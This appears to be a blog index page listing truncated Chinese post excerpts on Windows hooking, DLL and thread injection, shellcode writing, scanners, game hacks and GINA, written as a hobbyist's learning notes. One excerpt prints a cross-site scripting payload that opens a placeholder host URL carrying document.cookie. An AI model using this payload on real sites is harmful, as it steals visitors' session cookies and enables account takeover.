台部落yiyefangzhou24

好久沒有寫博了，今天一下課就來寫一篇，還是申明一下，菜鳥言論僅供娛樂，大牛看了可以忽略。最近突發奇想，想試試R3下的線程注入，線程注入有好多中方法，我選得是鉤子函數注入的方法，因爲之前一直在做掛鉤嘛，所以做起來比較容

2020-06-16 13:27:12

從所周知，在Windows NT/2000系統的API黑洞之一便是NTDLL.DLL,此DLL包含了許多未公開的API函數。本文將列舉一、二，並以如何獲取任何指定進程的父進程ID爲例作爲示範。 NTDLL.DLL中有一個函

2020-06-16 13:27:12

好久沒寫博客了，只因爲最近一段時間着手學習網絡入侵與滲透這塊，正好借了一個大學生創業孵化基地的項目，也申請了一個關於“蜜罐”設計的科研立項，準備一起給做了，由於剛剛踏入未知領地，也沒什麼好說的，讓我在這個領域摸黑探索一會再

2020-06-16 13:27:12

一大早的來到圖書館還把我的本本抗來了，就爲了寫一篇博客。這個博客其實說來挺愧疚的，原理搞錯了，卻也實現了預期之外的功能，如題R3下的自身進程守護。昨天下午和“列寧”交流了一下午，才發現原來我本來的構

2020-06-16 13:27:11

如何捕捉一個未知窗口的按鈕按下的消息？方法多種多樣，這裏我就介紹一種比較常見的方法——鉤子。原理上很簡單也很容易理解，安裝一個系統的全局鉤子，過濾所有的系統消息，當然了，可以過濾制定的系統消息，比如按鈕

2020-06-16 13:27:11

沒有調用遠程平臺，用web接收cookie <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 簡單的script鏈接遠程第

2020-06-16 13:27:10

首先我們要知道什麼是輸入法，我們經常用輸入法，但是你發現一個現象沒有？，在任務管理器中並沒有看到輸入法進程。當然了搜狗那種流氓軟件除外，說不定正在後臺做什麼偷偷摸摸的事情，當然要創建進程。輸入法的核心文件你找到安裝目錄就會發

2020-06-16 13:27:10

這是很久以前的一個代碼了。網絡掃描，掃描器這些名詞想必大家並不陌生，踩點啥的必備工具。掃描的方法多種多樣，目的也多種多樣，本菜鳥就隨便找了找資料簡單介紹一下： 1 主機存活掃描技術主機掃描的目的是確定在目標網絡上的主機是

2020-02-21 20:50:01

這也是好久以前的代碼了。我是菜鳥，在這個問題上研究的不夠深，說錯了還請大牛指正。這個問題也是一個老問題，不過我是菜鳥我有話要說。我在做這個問題的時候查閱了好多資料，其實這個問題不能算解決，這篇文章你將會看到一段比較長的代碼，其實這段

2020-02-21 20:50:01

最近使用到RegQueryValueEx這個函數，發現了兩個小問題，總是解決不了，上網上找資料發現不是找不到就是找的不對，現在終於解決了，所以分享給大家來看看，給那些還在困惑中徘徊的和我一樣的菜鳥看看，大牛就就直接飄過吧。 R

2020-02-21 20:50:01

很久沒有寫博客了，今天寫寫一個以前沒有寫過的話題，緩衝區溢出shellcode編寫。我是菜鳥，以前沒有寫過shellcode，最近也在忙着網絡的滲透，棧溢出也是零零碎碎的看到一些知識，大牛飄過，菜鳥言論僅供娛樂。大家同是菜鳥的人可以看

2020-02-21 20:50:01

好久沒寫博客了，呵呵。今天再來寫一篇。再次申明：菜鳥言論僅供娛樂。最近一直在準備一個比賽，所以進度就慢了下來。突然於幾天前突發奇想想自己做一個魔獸的改建，而且自己覺得也挺簡單的，有現成的鉤子模版，隨便寫寫就行了，哪知道遇到了困難

2020-02-21 20:50:01

最近在論壇上看到一個帖子，讀取輸入框中的內容，我也正在做這方面東西，於是就動手做了一下，原本以爲很簡單的東西，實際着手去做的時候倒是遇到了不小的麻煩。首先想要獲得一個未知的對話框的EDIT控件的內容無非就是幾個

2020-02-21 20:50:01

呵呵，這也是我無意中弄出來的一個小東西，大牛就飄過吧。這個程序就短短几行代碼，但是值得注意的是裏面一個64位數的輸出轉換問題，說實話我也不是太瞭解，因爲編程很少用到這麼一個大的數，先上代碼： #include "windows.h" #

2020-02-21 20:50:01

gina，正如微軟官方說明所說的： The GINA operates in the context of the Winlogon process and, as such, the GINA DLL is loaded very ea

2020-02-21 20:50:01